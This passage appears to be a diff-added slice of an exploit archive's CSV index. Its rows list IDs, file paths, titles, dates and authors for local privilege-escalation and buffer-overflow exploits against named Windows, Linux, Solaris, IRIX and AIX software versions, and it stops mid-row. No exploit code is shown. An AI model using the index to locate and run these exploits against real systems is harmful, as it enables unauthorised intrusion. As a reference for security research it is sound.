+18710,exploits/windows/local/18710.rb,"Csound - '.hetro' File Handling Stack Buffer Overflow (Metasploit)",2012-04-06,Metasploit,local,windows, +18726,exploits/windows/local/18726.py,"Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow",2012-04-09,"SkY-NeT SySteMs",local,windows, +18733,exploits/linux/local/18733.py,"WICD 1.7.1 - Local Privilege Escalation",2012-04-12,anonymous,local,linux, +18749,exploits/osx/local/18749.py,"Microsoft Office 2008 SP0 (Mac) - RTF pFragments",2012-04-18,"Abhishek Lyall",local,osx, +18747,exploits/windows/local/18747.rb,"CyberLink Power2Go - name Attribute (p2g) Stack Buffer Overflow (Metasploit)",2012-04-18,Metasploit,local,windows, +18748,exploits/windows/local/18748.rb,"GSM SIM Editor 5.15 - Local Buffer Overflow (Metasploit)",2012-04-18,Metasploit,local,windows, +18760,exploits/windows/local/18760.rb,"xRadio 0.95b - Local Buffer Overflow (Metasploit)",2012-04-20,Metasploit,local,windows, +18781,exploits/windows/local/18781.rb,"Shadow Stream Recorder 3.0.1.7 - Local Buffer Overflow (Metasploit)",2012-04-25,Metasploit,local,windows, +18783,exploits/linux/local/18783.txt,"mount.cifs - 'chdir()' Arbitrary Root File Identification",2012-04-25,Sha0,local,linux, +18785,exploits/linux/local/18785.txt,"Parallels PLESK 9.x - Insecure Permissions",2012-04-26,"Nicolas Krassas",local,linux, +18792,exploits/windows/local/18792.rb,"CPE17 Autorun Killer 1.7.1 - Local Stack Buffer Overflow (Metasploit)",2012-04-27,"Xenithz xpt",local,windows, +18808,exploits/windows/local/18808.html,"SAMSUNG NET-i Viewer 1.37 - Overwrite (SEH)",2012-05-01,blake,local,windows, +18823,exploits/windows/local/18823.txt,"Symantec pcAnywhere - Insecure File Permissions Privilege Escalation",2012-05-02,"Edward Torkington",local,windows, +18826,exploits/windows/local/18826.py,"AnvSoft Any Video Converter 4.3.6 - Local Stack Overflow",2012-05-03,cikumel,local,windows, +18861,exploits/win_x86/local/18861.php,"PHP 5.4.3 (Windows x86 Polish) - Code Execution",2012-05-11,0in,local,win_x86, +18862,exploits/windows/local/18862.php,"Adobe Photoshop CS5.1 - U3D.8BI Collada Asset Elements Stack Overflow",2012-05-11,rgod,local,windows, +18869,exploits/windows/local/18869.pl,"AnvSoft Any Video Converter 4.3.6 - Unicode Buffer Overflow",2012-05-12,h1ch4m,local,windows, +18892,exploits/windows/local/18892.txt,"SkinCrafter ActiveX Control 3.0 - Local Buffer Overflow",2012-05-17,"saurabh sharma",local,windows, +18905,exploits/windows/local/18905.rb,"Foxit Reader 3.0 - Open Execute Action Stack Based Buffer Overflow (Metasploit)",2012-05-21,Metasploit,local,windows, +18914,exploits/windows/local/18914.py,"Novell Client 4.91 SP4 - Local Privilege Escalation",2012-05-22,sickness,local,windows, +18917,exploits/linux/local/18917.txt,"Apache Mod_Auth_OpenID - Session Stealing",2012-05-24,"Peter Ellehauge",local,linux, +18923,exploits/windows/local/18923.rb,"OpenOffice - OLE Importer DocumentSummaryInformation Stream Handling Overflow (Metasploit)",2012-05-25,Metasploit,local,windows, +18981,exploits/windows/local/18981.txt,"Sysax 5.60 - Create SSL Certificate Buffer Overflow",2012-06-04,"Craig Freyman",local,windows, +18947,exploits/windows/local/18947.rb,"ispVM System - '.XCF' File Handling Overflow (Metasploit)",2012-05-29,Metasploit,local,windows, +18954,exploits/windows/local/18954.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (Metasploit)",2012-05-30,Metasploit,local,windows, +18959,exploits/multiple/local/18959.txt,"Browsers Browsers - Navigation Download Trick",2012-05-31,"Michal Zalewski",local,multiple, +19006,exploits/windows/local/19006.py,"Lattice Semiconductor PAC-Designer 6.21 - '.PAC' Local Overflow",2012-06-07,b33f,local,windows, +19037,exploits/windows/local/19037.rb,"Microsoft Office - ClickOnce Unsafe Object Package Handling (MS12-005) (Metasploit)",2012-06-11,Metasploit,local,windows, +19041,exploits/aix/local/19041.txt,"Digital Ultrix 4.0/4.1 - '/usr/bin/chroot' Local Privilege Escalation",1991-05-01,anonymous,local,aix, +19042,exploits/solaris/local/19042.txt,"SunOS 4.1.1 - '/usr/release/bin/makeinstall' Local Privilege Escalation",1999-11-23,anonymous,local,solaris, +19043,exploits/aix/local/19043.txt,"SunOS 4.1.1 - '/usr/release/bin/winstall' Local Privilege Escalation",1999-11-12,anonymous,local,aix, +19045,exploits/aix/local/19045.txt,"SunOS 4.1.3 - '/etc/crash' SetGID kmem Privilege Escalation",1993-02-03,anonymous,local,aix, +19066,exploits/irix/local/19066.txt,"SGI IRIX 5.3/6.2 / SGI license_oeo 1.0 LicenseManager - 'NETLS_LICENSE_FILE' Local Privilege Escalation",1996-04-05,"Arthur Hagen",local,irix, +19067,exploits/irix/local/19067.txt,"SGI IRIX 6.4 / SGI license_oeo 3.0/3.1/3.1.1 LicenseManager - 'LICENSEMGR_FILE_ROOT' Local Privilege Escalation",1996-11-22,"Yuri Volobuev",local,irix, +19068,exploits/unix/local/19068.txt,"Digital UNIX 4.0/4.0 B/4.0 D - SUID/SGID Core File",1998-04-06,"ru5ty & SoReN",local,unix, +19070,exploits/linux/local/19070.txt,"Slackware Linux 3.4 - 'liloconfig-color' Temporary File",1998-04-06,neonhaze,local,linux, +19071,exploits/linux/local/19071.txt,"Slackware Linux 3.4 - 'makebootdisk' Temporary File",1998-04-06,neonhaze,local,linux, +19072,exploits/linux/local/19072.txt,"ISC BIND 4.9.7 -T1B - named SIGINT / SIGIOT Symlink",1998-04-10,"Joe H",local,linux, +19073,exploits/linux/local/19073.txt,"Slackware Linux 3.4 - 'netconfig' Temporary File",1998-04-06,neonhaze,local,linux, +19074,exploits/linux/local/19074.txt,"Slackware Linux 3.4 - 'pkgtool' Temporary File",1998-04-06,neonhaze,local,linux, +19077,exploits/linux/local/19077.c,"Fred N. van Kempen dip 3.3.7 - Local Buffer Overflow (1)",1998-05-05,jamez,local,linux, +19078,exploits/linux/local/19078.c,"Fred N. van Kempen dip 3.3.7 - Local Buffer Overflow (2)",1998-05-05,pr10n,local,linux, +19080,exploits/linux/local/19080.txt,"Debian suidmanager 0.18 - Command Execution",1998-04-28,"Thomas Roessler",local,linux, +19095,exploits/linux/local/19095.txt,"GNU GNU bash 1.14 - Path Embedded Code Execution",1999-04-20,Shadow,local,linux, +19106,exploits/linux/local/19106.c,"BSDI BSD/OS 2.1 / FreeBSD 2.1 / IBM AIX 4.2 / SGI IRIX 6.4 / Sun SunOS 4.1.3 - Buffer Overrun",1996-07-03,"Jeff Uphoff",local,linux, +19108,exploits/unix/local/19108.txt,"HP HP-UX 10.20/11.0 / IBM AIX 4.3 / SCO Unixware 7.0 / Sun Solaris 2.6 - Change File Permission",1999-11-03,Mastoras,local,unix, +19122,exploits/linux/local/19122.txt,"Slackware Linux 3.5 - '/etc/group' Local Privilege Escalation",1998-07-13,"Richard Thomas",local,linux, +19125,exploits/linux/local/19125.txt,"Oracle 8 - oratclsh Suid",1999-04-29,"Dan Sugalski",local,linux, +19126,exploits/solaris/local/19126.txt,"Sun Solaris 2.6 - power management",1998-07-16,"Ralf Lehmann",local,solaris, +19128,exploits/solaris/local/19128.c,"Sun Solaris 7.0 - '/usr/dt/bin/sdtcm_convert' Local Overflow / Privilege Escalation",1998-10-23,UNYUN,local,solaris, +19138,exploits/windows/local/19138.txt,"ESRI ArcGIS 10.0.x / ArcMap 9 - Arbitrary Code Execution",2012-06-14,"Boston Cyber Defense",local,windows, +19139,exploits/multiple/local/19139.py,"Adobe Illustrator CS5.5 - Memory Corruption",2012-06-14,"Felipe Andres Manzano",local,multiple, +19142,exploits/linux/local/19142.sh,"Oracle 8 - File Access",1999-05-06,"Kevin Wenchel",local,linux, +19143,exploits/windows/local/19143.c,"Microsoft Windows - 'April Fools 2001' Set Incorrect Date",1999-01-07,"Richard M. Smith",local,windows, +19144,exploits/windows/local/19144.txt,"Microsoft Zero Administration Kit (ZAK) 1.0 / Office97 - Backdoor Access",1999-01-07,"Satu Laksela",local,windows, +19145,exploits/windows/local/19145.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4 - Server Operator to Administrator Privilege Escalation: System Key",1999-01-11,Mnemonix,local,windows, +19146,exploits/linux/local/19146.sh,"DataLynx suGuard 1.0 - Local Privilege Escalation",1999-01-03,"Dr. Mudge",local,linux, +19158,exploits/solaris/local/19158.c,"Sun Solaris 2.5.1 PAM / unix_scheme - 'passwd' Local Privilege Escalation",1997-02-25,"Cristian Schipor",local,solaris, +19159,exploits/solaris/local/19159.c,"Solaris 2.5.1 - 'ffbconfig' Local Privilege Escalation",1997-02-10,"Cristian Schipor",local,solaris, +19160,exploits/solaris/local/19160.c,"Solaris 2.5.1 - 'chkey' Local Privilege Escalation",1997-05-19,"Adam Morrison",local,solaris, +19163,exploits/irix/local/19163.sh,"SGI IRIX 6.4 - 'ioconfig' Local Privilege Escalation",1998-07-20,Loneguard,local,irix, +19167,exploits/windows/local/19167.txt,"Ipswitch IMail 5.0 / Ipswitch WS_FTP Server 1.0.1/1.0.2 - Local Privilege Escalation",1999-02-04,Marc,local,windows, +19168,exploits/unix/local/19168.sh,"SGI IRIX 6.5.4 / Solaris 2.5.1 - ps(1) Buffer Overflow",1997-04-28,"Joe Zbiciak",local,unix, +19172,exploits/unix/local/19172.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - 'xlock' Local Overflow / Privilege Escalation (1)",1997-04-26,cesaro,local,unix, +19173,exploits/unix/local/19173.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - '/usr/bin/X11/xlock' Local Privilege Escalation (2)",1997-04-26,BeastMaster,local,unix, +19175,exploits/windows/local/19175.rb,"Lattice Semiconductor PAC-Designer 6.21 - Symbol Value Buffer Overflow (Metasploit)",2012-06-17,Metasploit,local,windows, +19176,exploits/windows/local/19176.rb,"TFM MMPlayer - '.m3u' / '.ppl' Local Buffer Overflow (Metasploit)",2012-06-15,Metasploit,local,windows, +19192,exploits/windows/local/19192.txt,"Hancom Office 2007 - 'Reboot.ini' Clear-Text Passwords",1999-02-09,"Russ Cooper",local,windows, +19195,exploits/windows/local/19195.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 - LSA Secrets",1997-07-16,"Paul Ashton",local,windows, +19196,exploits/windows/local/19196.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - RAS Dial-up Networking Save Password",1998-03-19,"Martin Dolphin",local,windows, +19198,exploits/windows/local/19198.txt,"Microsoft Windows NT 4.0 SP4 - Known DLL Cache",1999-02-18,L0pht,local,windows, +19199,exploits/solaris/local/19199.c,"Solaris 2.5.1 - 'automount' Local Privilege Escalation",1997-11-26,anonymous,local,solaris, +19200,exploits/unix/local/19200.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (1)",1997-08-25,bloodmask,local,unix, +19201,exploits/unix/local/19201.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (2)",1997-08-25,jGgM,local,unix, +19202,exploits/unix/local/19202.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (3)",1997-08-25,jGgM,local,unix, +19203,exploits/unix/local/19203.c,"BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - 'rlogin' Local Privilege Escalation",1996-12-04,"Roger Espel Llima",local,unix, +19205,exploits/solaris/local/19205.c,"Sun Solaris 7.0 - '/usr/dt/bin/dtprintinfo' Local Buffer Overflow",1999-05-10,UNYUN@ShadowPenguin,local,solaris, +19206,exploits/solaris/local/19206.c,"Sun Solaris 7.0 - '/usr/bin/lpset' Local Buffer Overflow",1999-05-11,"kim yong-jun",local,solaris, +19209,exploits/windows/local/19209.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - Help File Buffer Overflow",1999-05-17,"David Litchfield",local,windows, +19210,exploits/irix/local/19210.txt,"SGI IRIX 6.5.4 - midikeys Root",1999-05-19,"W. Cashdollar",local,irix, +19211,exploits/windows/local/19211.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - RAS Phonebook Buffer Overflow",1999-05-20,"David Litchfield",local,windows, +19213,exploits/aix/local/19213.sh,"IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (1)",1999-05-22,UNYUN@ShadowPenguinSecurity,local,aix, +19214,exploits/aix/local/19214.c,"IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (2)",1999-05-22,"Georgi Guninski",local,aix, +19215,exploits/aix/local/19215.c,"IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (3)",1999-05-22,UNYUN,local,aix, +19216,exploits/aix/local/19216.c,"IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (4)",1999-05-22,ahmed@securityfocus.com,local,aix, +19217,exploits/aix/local/19217.c,"IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (5)",1999-05-22,UNYUN,local,aix, +19220,exploits/windows/local/19220.c,"Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Decrypt Pages",1998-05-19,"Matt Chapman",local,windows, +19227,exploits/windows/local/19227.txt,"IBM Remote Control Software 1.0 - Code Execution",1999-05-10,"Thomas Krug",local,windows, +19229,exploits/aix/local/19229.txt,"IBM AIX eNetwork Firewall 3.2/3.3 - Insecure Temporary File Creation",1999-05-25,"Paul Cammidge",local,aix, +19232,exploits/solaris/local/19232.txt,"SunOS 4.1.4 - arp(8c) Memory Dump",1994-02-01,anonymous,local,solaris, +19233,exploits/solaris/local/19233.txt,"Solaris 7.0 - aspppd Insecure Temporary File Creation",1996-12-20,Al-Herbish,local,solaris, +19234,exploits/solaris/local/19234.c,"Solaris 7.0 - 'cancel' Local Privilege Escalation",1999-03-05,"Josh A. Strickland",local,solaris, +19235,exploits/solaris/local/19235.txt,"Solaris 7.0 - 'chkperm' Local Privilege Escalation",1996-12-05,"Kevin L Prigge",local,solaris, +19240,exploits/linux/local/19240.c,"Caldera kdenetwork 1.1.1-1 / Caldera OpenLinux 1.3/2.2 / KDE KDE 1.1/1.1. / RedHat Linux 6.0 - K-Mail File Creation",1999-06-09,"Brian Mitchell",local,linux, +19243,exploits/linux/local/19243.txt,"G. Wilford man 2.3.10 - Symlink",1999-06-02,"Thomas Fischbacher",local,linux, +19244,exploits/osx/local/19244.sh,"Apple Mac OSX Server 10.0 - Overload",1999-06-03,"Juergen Schmidt",local,osx, +19249,exploits/linux/local/19249.c,"Xcmail 0.99.6 - Local Buffer Overflow",1999-03-02,Arthur,local,linux, +19401,exploits/windows/local/19401.txt,"Apple QuickTime - QuickTime.util.QTByteObject Initialization Security Checks Bypass",2012-06-26,"Security Explorations",local,windows, +19254,exploits/linux/local/19254.c,"S.u.S.E Linux 5.2 - 'gnuplot' Local Overflow / Privilege Escalation",1999-03-04,xnec,local,linux, +19255,exploits/linux/local/19255.txt,"RedHat Linux 5.2 i386/6.0 - No Logging",1999-06-09,"Tani Hosokawa",local,linux, +19256,exploits/linux/local/19256.c,"Stanford University bootpd 2.4.3 / Debian 2.0 - netstd",1999-01-03,anonymous,local,linux, +19257,exploits/linux/local/19257.c,"X11R6 3.3.3 - Symlink",1999-03-21,Stealthf0rk,local,linux, +19258,exploits/solaris/local/19258.sh,"Sun Solaris 7.0 - 'ff.core' Local Privilege Escalation",1999-01-07,"John McDonald",local,solaris, +19259,exploits/linux/local/19259.c,"S.u.S.E Linux 5.2 - 'lpc' Local Privilege Escalation",1999-02-03,xnec,local,linux, +19260,exploits/irix/local/19260.sh,"SGI IRIX 6.2 - '/usr/lib/netaddpr' Local Privilege Escalation",1997-05-09,"Jaechul Choe",local,irix, +19261,exploits/netbsd_x86/local/19261.txt,"NetBSD 1.3.2 / SGI IRIX 6.5.1 - 'at(1)' Read File",1998-06-27,Gutierrez,local,netbsd_x86, +19262,exploits/irix/local/19262.txt,"SGI IRIX 6.2 - 'cdplayer' Local Privilege Escalation",1996-11-21,"Yuri Volobuev",local,irix, +19267,exploits/irix/local/19267.c,"SGI IRIX 6.3 - xrm Buffer Overflow",1997-05-27,"David Hedley",local,irix, +19268,exploits/irix/local/19268.txt,"SGI IRIX 5.3 - 'Cadmin' Local Privilege Escalation",1996-08-06,"Grant Kaufmann",local,irix, +19269,exploits/irix/local/19269.txt,"SGI IRIX 6.0.1 - 'colorview' Read Files",1995-02-09,"Dave Sill",local,irix, +19270,exploits/linux/local/19270.c,"Debian 2.0 - Super Syslog Buffer Overflow",1999-02-25,c0nd0r,local,linux, +19273,exploits/irix/local/19273.sh,"SGI IRIX 6.2 - 'day5notifier' Local Privilege Escalation",1997-05-16,"Mike Neuman",local,irix, +19274,exploits/irix/local/19274.c,"SGI IRIX 6.3 - 'df' Local Privilege Escalation",1997-05-24,"David Hedley",local,irix, +19275,exploits/irix/local/19275.txt,"SGI IRIX 6.4 - 'datman'/'cdman' Local Privilege Escalation",1996-12-09,"Yuri Volobuev",local,irix, +19276,exploits/irix/local/19276.c,"SGI IRIX 6.2 - 'eject' Local Privilege Escalation (1)",1997-05-25,DCRH,local,irix, +19277,exploits/irix/local/19277.c,"SGI IRIX 6.2 - 'eject' Local Privilege Escalation (2)",1997-05-25,"Last Stage of Delirium",local,irix, +19279,exploits/linux/local/19279.sh,"RedHat Linux 2.1 - 'abuse.console' Local Privilege Escalation",1996-02-02,"David J Meltzer",local,linux, +19280,exploits/irix/local/19280.txt,"SGI IRIX 6.2 - 'fsdump' Local Privilege Escalation",1996-12-03,"Jaechul Choe",local,irix, +19281,exploits/linux/local/19281.c,"RedHat Linux 5.1 - xosview",1999-05-28,"Chris Evans",local,linux, +19283,exploits/linux/local/19283.c,"Slackware Linux 3.1 - '/usr/X11/bin/SuperProbe' Local Buffer Overflow",1997-03-04,Solar,local,linux, +19284,exploits/linux/local/19284.c,"Armidale Software Yapp Conferencing System 2.2 - Local Buffer Overflow",1998-01-20,satan,local,linux, +19285,exploits/linux/local/19285.txt,"Slackware Linux 3.1/3.2 - 'color_xterm' Local Buffer Overflow (1)",1997-05-27,zgv,local,linux, +19286,exploits/linux/local/19286.c,"Slackware Linux 3.1/3.2 - 'color_xterm' Local Buffer Overflow (2)",1997-05-27,"Solar Designer",local,linux, +19287,exploits/aix/local/19287.c,"IBM AIX 4.3 - 'infod' Local Privilege Escalation",1998-11-21,"Repent Security Inc",local,aix, +19293,exploits/windows/local/19293.py,"Sysax 5.62 - Admin Interface Local Buffer Overflow",2012-06-20,"Craig Freyman",local,windows, +19602,exploits/linux/local/19602.c,"Eric Allman Sendmail 8.8.x - Socket Hijack",1999-11-05,"Michal Zalewski",local,linux, +19300,exploits/aix/local/19300.txt,"IBM AIX 4.2.1 - 'snap' Insecure Temporary File Creation",1999-02-17,"Larry W. Cashdollar",local,aix, +19302,exploits/linux/local/19302.c,"Linux libc 5.3.12 / RedHat Linux 4.0 / Slackware Linux 3.1 - libc NLSPATH",1998-01-19,Solar,local,linux, +19304,exploits/irix/local/19304.txt,"SGI IRIX 6.4 - 'inpview' Local Privilege Escalation",1997-05-07,"Yuri Volobuev",local,irix, +19305,exploits/linux/local/19305.c,"RedHat Linux 5.0 - 'msgchk' Local Privilege Escalation",1998-01-19,"Cesar Tascon Alvarez",local,linux, +19306,exploits/aix/local/19306.c,"IBM AIX 4.2.1 - '/usr/bin/portmir' Local Buffer Overflow / Insecure Temporary File Creation",1997-10-29,"BM ERS Team",local,aix, +19307,exploits/aix/local/19307.c,"IBM AIX 4.2 - 'ping' Local Buffer Overflow",1997-07-21,"Bryan P. Self",local,aix, +19309,exploits/aix/local/19309.c,"IBM AIX 4.2 - '/usr/sbin/lchangelv' Local Buffer Overflow",1997-07-21,"Bryan P. Self",local,aix, +19310,exploits/irix/local/19310.c,"SGI IRIX 6.4 - 'login' Local Privilege Escalation",1997-05-26,"David Hedley",local,irix, +19311,exploits/linux/local/19311.c,"RedHat Linux 4.2 / SGI IRIX 6.3 / Solaris 2.6 - 'mailx' (1)",1998-06-20,"Alvaro Martinez Echevarria",local,linux, +19312,exploits/linux/local/19312.c,"RedHat Linux 4.2 / SGI IRIX 6.3 / Solaris 2.6 - 'mailx' (2)",1998-06-25,segv,local,linux, +19313,exploits/irix/local/19313.txt,"SGI IRIX 6.4 - 'netprint' Local Privilege Escalation",1997-01-04,"Yuri Volobuev",local,irix, +19314,exploits/linux/local/19314.c,"RedHat Linux 5.0/5.1/5.2 / Slackware Linux 3.5 - 'klogd' Local Buffer Overflow (1)",1999-02-26,"Michal Zalewski",local,linux, +19315,exploits/linux/local/19315.c,"RedHat Linux 5.0/5.1/5.2 / Slackware Linux 3.5 - 'klogd' Local Buffer Overflow (2)",1999-02-26,"Esa Etelavuori",local,linux, +19317,exploits/irix/local/19317.c,"SGI IRIX 5.3/6.2 - 'ordist' Local Privilege Escalation",1997-05-24,"Yuri Volobuev",local,irix, +19318,exploits/aix/local/19318.c,"SGI IRIX 6.4 - Permissions Buffer Overflow",1997-05-26,"David Hedley",local,aix, +19319,exploits/irix/local/19319.txt,"SGI IRIX 5.3 - 'pkgadjust' Local Privilege Escalation",1996-09-23,"Hui-Hui Hu",local,irix, +19411,exploits/bsd/local/19411.txt,"BSDI BSD/OS 4.0 /FreeBSD 3.2 /NetBSD 1.4 x86 / OpenBSD 2.5 - UFS Secure Level 1",1999-07-02,Stealth,local,bsd, +19412,exploits/windows/local/19412.c,"Qbik WinGate 3.0 - Registry",1999-02-22,Chris,local,windows, +19323,exploits/windows/local/19323.c,"URL Hunter - Local Buffer Overflow (DEP Bypass)",2012-06-21,Ayrbyte,local,windows, +19341,exploits/solaris/local/19341.c,"Solaris 2.5.1 - 'kcms' Local Buffer Overflow (1)",1998-12-24,"Cheez Whiz",local,solaris, +19342,exploits/solaris/local/19342.c,"Solaris 2.5.1 - 'kcms' Local Buffer Overflow (2)",1998-12-24,UNYUN,local,solaris, +19343,exploits/solaris/local/19343.c,"Solaris 2.5.1 - rsh socket Descriptor",1997-06-19,"Alan Cox",local,solaris, +19344,exploits/aix/local/19344.sh,"IBM AIX 3.2.5 - 'IFS' Local Privilege Escalation",1994-04-02,anonymous,local,aix, +19345,exploits/aix/local/19345.txt,"IBM AIX 4.2.1 - 'lquerypv' File Read",1996-11-24,Aleph1,local,aix, +19346,exploits/freebsd/local/19346.c,"FreeBSD 3.1 / Solaris 2.6 - Domain Socket",1997-06-19,"Thamer Al-Herbish",local,freebsd, +19347,exploits/irix/local/19347.c,"SGI IRIX 6.3 - 'pset' Local Privilege Escalation",1997-07-17,"Last Stage of Delirium",local,irix, +19349,exploits/irix/local/19349.txt,"SGI IRIX 6.4 - 'rmail' Local Privilege Escalation",1997-05-07,"Yuri Volobuev",local,irix, +19350,exploits/solaris/local/19350.sh,"Solaris 2.5.1 - License Manager",1998-10-21,"Joel Eriksson",local,solaris, +19351,exploits/irix/local/19351.sh,"SGI IRIX 5.2/5.3 - 'serial_ports' Local Privilege Escalation",1994-02-02,transit,local,irix, +19353,exploits/irix/local/19353.txt,"SGI IRIX 6.4 - 'suid_exec' Local Privilege Escalation",1996-12-02,"Yuri Volobuev",local,irix, +19354,exploits/aix/local/19354.txt,"SGI IRIX 5.1/5.2 - 'sgihelp' Local Privilege Escalation",1996-12-02,anonymous,local,aix, +19355,exploits/irix/local/19355.txt,"SGI IRIX 6.4 - 'startmidi' Local Privilege Escalation",1997-02-09,"David Hedley",local,irix, +19356,exploits/irix/local/19356.txt,"SGI IRIX 6.3 - 'Systour' / 'OutOfBox' Local Privilege Escalation",1996-10-30,"Tun-Hui Hu",local,irix, +19358,exploits/irix/local/19358.txt,"SGI IRIX 6.4 - 'xfsdump' Local Privilege Escalation",1997-05-07,"Yuri Volobuev",local,irix, +19359,exploits/windows/local/19359.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4 / NT 3.5.1/SP1/SP2/SP3/SP4/SP5 - Screensaver",1999-03-10,"Cybermedia Software Private Limited",local,windows, +19360,exploits/linux/local/19360.c,"Linux libc 5.3.12/5.4 / RedHat Linux 4.0 - 'vsyslog()' Local Buffer Overflow",1997-12-21,"Solar Designer",local,linux, +19362,exploits/sco/local/19362.c,"SCO Open Server 5.0.5 - XBase Buffer Overflow",1999-06-14,doble,local,sco, +19364,exploits/netware/local/19364.txt,"Novell Netware 4.1/4.11 - SP5B Remote.NLM Weak Encryption",1999-04-09,dreamer,local,netware, +19384,exploits/linux/local/19384.c,"Debian 2.1 - Print Queue Control",1999-07-02,"Chris Leishman",local,linux, +19370,exploits/linux/local/19370.c,"Xi Graphics Accelerated X 4.0.x/5.0 - Local Buffer Overflow",1999-06-25,KSR[T],local,linux, +19371,exploits/linux/local/19371.c,"VMware 1.0.1 - Local Buffer Overflow",1999-06-25,funkysh,local,linux, +19373,exploits/linux/local/19373.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E 6.1 - 'Lsof' Local Buffer Overflow (1)",1999-02-17,c0nd0r,local,linux, +19374,exploits/linux/local/19374.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E 6.1 - 'Lsof' Local Buffer Overflow (2)",1999-02-17,Zhodiac,local,linux, +19376,exploits/windows/local/19376.txt,"Microsoft IIS 2.0/3.0/4.0 - ISAPI GetExtensionVersion()",1999-03-08,"Fabien Royer",local,windows, +19417,exploits/osx/local/19417.txt,"Apple Mac OS 8 8.6 - Weak Password Encryption",1999-07-10,"Dawid adix Adamski",local,osx, +19418,exploits/aix/local/19418.txt,"IBM AIX 4.3.1 - 'adb' Denial of Service",1999-07-12,"GZ Apple",local,aix, +19419,exploits/linux/local/19419.c,"Linux Kernel 2.0.37 - Segment Limit Privilege Escalation",1999-07-13,Solar,local,linux, +19422,exploits/linux/local/19422.txt,"BMC Software Patrol 3.2.5 - Patrol SNMP Agent File Creation/Permission",1999-07-14,"Andrew Alness",local,linux, +19425,exploits/windows/local/19425.txt,"Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS (2)",1999-07-19,"Wanderley J. Abreu Jr",local,windows, +19427,exploits/osx/local/19427.txt,"Apple At Ease 5.0 - Information Disclosure",1999-05-13,"Tim Conrad",local,osx, +19428,exploits/linux/local/19428.c,"Samba < 2.0.5 - Local Overflow",1999-07-21,"Gerald Britton",local,linux, +19429,exploits/linux/local/19429.sh,"Rational Software ClearCase for Unix 3.2 - ClearCase SUID",1999-05-02,Mudge,local,linux, +19430,exploits/multiple/local/19430.txt,"GNU groff 1.11 a / HP-UX 10.0/11.0 / SGI IRIX 6.5.3 - Malicious Manpage",1999-07-25,"Pawel Wilk",local,multiple, +19433,exploits/windows/local/19433.rb,"Apple QuickTime - TeXML Stack Buffer Overflow (Metasploit)",2012-06-28,Metasploit,local,windows, +19434,exploits/osx/local/19434.txt,"Quinn - 'the Eskimo' and Peter N. Lewis Internet Configuration 1.0/2.0 Weak Password Encryption",1999-07-28,"Dawid adix Adamski",local,osx, +19437,exploits/osx/local/19437.txt,"ELS Screen to Screen 1.0 - Multiple Password Vulnerabilities",1999-07-29,"Prozaq of mSec",local,osx, +19438,exploits/osx/local/19438.txt,"Ogopogo Autothenticate 1.1.5 - Weak Password Encryption",1999-07-29,"Prozaq of mSec",local,osx, +19439,exploits/osx/local/19439.txt,"Power On Software On Guard for MacOS 3.2 - Emergency Password",1999-07-29,"Prozaq of mSec",local,osx, +19440,exploits/windows/local/19440.c,"Microsoft Windows NT 4.0/SP 1/SP 2/Sp 3/SP 4/SP 5 - Malformed Dialer Entry",1999-07-30,"David Litchfield",local,windows, +19447,exploits/multiple/local/19447.c,"NetBSD 1.4 / OpenBSD 2.5 / Solaris 7.0 - 'profil(2)' Modify The Internal Data Space",1999-08-09,"Ross Harvey",local,multiple, +19460,exploits/multiple/local/19460.sh,"Oracle 8 8.1.5 - Intelligent Agent (1)",1999-08-16,"Brock Tellier",local,multiple, +19461,exploits/multiple/local/19461.c,"Oracle 8 8.1.5 - Intelligent Agent (2)",1999-08-16,"Gilles PARC",local,multiple, +19462,exploits/windows/local/19462.c,"Microsoft Windows 95/98 Internet Explorer 5/Telnet - Local Heap Overflow",1999-08-16,"Jeremy Kothe",local,windows, +19464,exploits/linux/local/19464.c,"RedHat Linux 6.0 / Slackware Linux 4.0 - Termcap 'tgetent()' Local Buffer Overflow 